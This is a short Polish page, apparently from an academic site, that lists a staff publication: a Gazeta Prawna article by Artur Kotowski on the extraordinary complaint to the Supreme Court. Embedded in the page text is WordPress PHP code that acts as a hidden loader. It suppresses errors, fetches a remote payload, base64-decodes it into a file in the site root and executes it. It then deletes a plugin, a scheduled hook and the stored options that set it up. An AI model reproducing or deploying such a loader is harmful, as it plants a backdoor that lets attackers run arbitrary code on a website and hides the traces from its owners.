Ostatnie publikacje naszej kadry naukowo – dydaktycznej

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);
Skarga nie taka znowu nadzwyczajna. Radość prawników jest nieuzasadniona.

Autor: Artur Kotowski

http://prawo.gazetaprawna.pl/artykuly/1102423,skarga-nadzwyczajna-sad-najwyzszy.html